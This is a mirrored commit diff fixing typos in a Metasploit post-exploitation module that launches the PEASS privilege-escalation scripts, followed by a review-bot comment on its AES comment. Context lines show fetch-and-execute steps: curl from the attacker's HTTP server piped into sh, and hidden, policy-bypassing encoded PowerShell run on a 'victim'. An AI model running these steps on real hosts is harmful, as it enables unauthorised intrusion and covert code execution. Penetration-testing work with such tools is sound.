mirror of
https://github.com/carlospolop/PEASS-ng
synced 2024-11-24 01:26:22 +01:00
Update peass.rb
Fix typos, grammar and misspelled words.
parent
41e2367be6
commit
6525727ca9
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post
|
||||
'Name' => 'Multi PEASS launcher',
|
||||
'Description' => %q{
|
||||
This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
|
||||
You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
|
||||
You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
|
||||
By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
|
||||
You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
|
||||
},
|
||||
@ -56,14 +56,14 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
# Load PEASS script in memory
|
||||
peass_script = load_peass()
|
||||
print_good("PEASS script successfully retreived.")
|
||||
print_good("PEASS script successfully retrieved.")
|
||||
|
||||
# Obfuscate loaded PEASS script
|
||||
if datastore["PASSWORD"].length > 1
|
||||
# If no Windows, check if openssl exists
|
||||
if !session.platform.include?("win")
|
||||
openssl_path = cmd_exec("command -v openssl")
|
||||
raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
|
||||
raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
|
||||
end
|
||||
|
||||
# Get encrypted PEASS script in B64
|
||||
@ -97,7 +97,7 @@ class MetasploitModule < Msf::Post
|
||||
# If no Windows, check if base64 exists
|
||||
if !session.platform.include?("win")
|
||||
base64_path = cmd_exec("command -v base64")
|
||||
raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
|
||||
raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
|
||||
end
|
||||
|
||||
# Encode PEASS script
|
||||
@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
|
||||
last_cmd = " ; rm #{temp_path}"
|
||||
end
|
||||
|
||||
# Instead of writting the file to disk, download it from HTTP
|
||||
# Instead of writing the file to disk, download it from HTTP
|
||||
else
|
||||
last_cmd = ""
|
||||
# Start HTTP server
|
||||
@ -159,13 +159,13 @@ class MetasploitModule < Msf::Post
|
||||
url_download_peass = http_protocol + http_ip + http_port + http_path
|
||||
print_good("Listening in #{url_download_peass}")
|
||||
|
||||
# Configure the download of the scrip in Windows
|
||||
# Configure the download of the script in Windows
|
||||
if session.platform.include?("win")
|
||||
cmd = "$ProgressPreference = 'SilentlyContinue';"
|
||||
cmd += get_bypass_tls_cert()
|
||||
cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
|
||||
|
||||
# Configure the download of the scrip in unix
|
||||
# Configure the download of the script in Unix
|
||||
else
|
||||
cmd = "curl -k -s \"#{url_download_peass}\""
|
||||
curl_path = cmd_exec("command -v curl")
|
||||
@ -193,7 +193,7 @@ class MetasploitModule < Msf::Post
|
||||
|
||||
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
|
||||
|
||||
# If unix, then, suppose linpeas was loaded
|
||||
# If Unix, then, suppose linpeas was loaded
|
||||
else
|
||||
cmd += "| #{decode_linpeass_cmd}"
|
||||
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
|
||||
@ -259,7 +259,7 @@ class MetasploitModule < Msf::Post
|
||||
end
|
||||
|
||||
def aes_enc_peass(peass_script)
|
||||
# Encrypt the PEASS script with aes
|
||||
# Encrypt the PEASS script with AES (CBC Mode)
|
||||
key = datastore["PASSWORD"]
|
||||
iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
|
||||
|
||||
|
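Review bot: The reworded comment in `aes_enc_peass` now names the mode but still omits what a reader needs to judge the scheme. As far as this hunk shows, `key = datastore["PASSWORD"]` is used as the AES-256 key without derivation, which would explain the "set a 32B length password" message in the base64 hunk, and CBC provides no integrity check on the ciphertext. I would write it as `# Encrypt the PEASS script with AES-256-CBC; PASSWORD is used as the raw 32-byte key and the output is not authenticated`. The context line below builds the cipher through `OpenSSL::Cipher::Cipher`, a deprecated alias that newer openssl gem releases may no longer provide; `OpenSSL::Cipher.new('aes-256-cbc').random_iv` is the current spelling. The method body continues past the end of the hunk, so how the key and IV are used afterwards is not visible here.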